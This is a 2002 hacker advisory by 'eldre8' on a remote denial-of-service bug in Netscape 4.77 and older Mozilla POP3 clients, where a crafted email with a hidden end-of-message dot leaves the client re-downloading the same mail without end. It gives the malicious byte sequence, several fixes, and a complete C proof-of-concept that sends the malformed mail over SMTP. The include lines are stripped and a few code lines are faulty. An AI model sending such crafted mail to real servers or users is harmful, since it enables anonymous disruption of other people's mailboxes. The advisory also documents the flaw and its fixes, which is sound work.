////////////////////////////////////////////
///// Strange Software Behaviour Report
///
//// discovered, understood and exploited between 05, 08 2001
//// (yes, i took the time... :) )
/// eldre8
Wed Jun 12 20:47:59 CEST 2002
\/\/\_/-> System affected:
Netscape v =<4.77
Mozilla <1.1
^\/\/'\-> System not affected:
Outlook Express 4.72.3110.5
maybe the other versions of Outlook
|_/\/\\/> Buggy software team contacted about this:
Yes, the bug is fixed now.
/\/\/\_/> Exploitation: remote & very easy & very anonymous :(
_/\/\/\_> Effects: With this remote hole, we can block any mail
box that is checked with a pop3 client, so the
hotmail, yahoo like servers are not affected.
A mail will cause the pop3 client to desynchronize
with the server, losing the connection to it, and
so, leaves all messages on the server (explain later)...
-/\/\/\/> Explanation: In the SMTP protocol, we can send mail with
some introduction command (ehlo,mail,rcpt) and then
type our messages and place a dot at a new line to
specify to the MTA that it is the end of the message.
On the other side, when a POP3 client check mail, it
connect to the server, retreive the mail, it terminate
the download of a message when it sees a dot at a new line.
And here is the trick.
If we can place a dot at a new line, and place other
words below this dot, the client will beleive the mail
is finished and will try to download next messages, thus
beiing desynchronize with the server...
The POP3 client act as:
login on to the POP3 server
retrieve mails
delete mails
logout
but if it is desynchronize, it will retreive mail, and
disconnect, thus didn't delete mails, and the next time
it login, it will refind the same mail, will retreive one
more time the mails, disconnect, and other and other...
A more detailed explanation,
here it is a simple end of a normal mail:
blabla...
\x0a
\x0a
and this is the bad mail:
blabla...
\x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
blabla...
\x0a\x20\x00
\x0a
We can see at the end of the two 0x0a, it seems that it is just
place here by the console...forget it.
At this stage, you could catch the bug...
=\/\/\/-> Possible fixes: There are different ways to fix this,
- one way is from the client, to stop the bad mail,
this is to connect manually via telnet to the pop3
server, and then identify the bad message and do a
dele <# of the message>
- one better way is to fix this from the client itself,
the client can get the size of each messages via
the list command, so it should be able to retrieve
the complete message, not less, not more...
- one way is to fix the MTA so it will not accept such
the code below...
~\/\/\/~> (buggy:])Exploit:
/* this is the code that comes with my
* advisory #1 to illustrate this...
* eldre8 at afturgurluk (double dot minus one) org
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"
#define PORT 25
int sock;
char buffer[255];
void SigCatch() {
fprintf(stderr, "\b\bbye!\n");
close(sock);
exit(0);
}
int main() {
/* I was too lame to implement the command line... :) */
int i;
struct sockaddr_in sout;
struct hostent *hp;
signal(SIGINT, SigCatch);
hp=gethostbyname(MX);
sock=socket(AF_INET, SOCK_STREAM, 0);
if (sock<0) {
perror("sock");
return -1;
}
sout.sin_family=AF_INET;
sout.sin_port=htons(PORT);
memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
if (connect(sock, &sout, sizeof(sout))<0) {
perror("connect");
return -1;
}
recv(sock, buffer, 255, 0); /* receive the banner... */
send(sock, EHLO, sizeof(EHLO), 0);
recv(sock, buffer, 255, 0); /* receive the welcome message... */
send(sock, MAIL, sizeof(MAIL), 0);
recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
send(sock, RCPT, sizeof(RCPT), 0);
recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
send(sock, DATA, sizeof(DATA), 0);
recv(sock, buffer, 255, 0);
i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
*(buffer+i)="\x0";
sprintf(buffer+i+1, "\n.\n");
send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
recv(sock, buffer, 255, 0);
send(sock, QUIT, sizeof(QUIT), 0);
recv(sock, buffer, 255, 0);
close(sock);
return 0;
}
=_-/\/`-> Greetz/Shouts:
all who know me, and all that I forget here because of anonymity reason...
especially french speaking boys & girls! ;)
And special to anyone in search of knowledge and those who distribute
knowledge.
You can find this report on: afturgurluk.org/~eldre8/files/pop3client_dos.txt
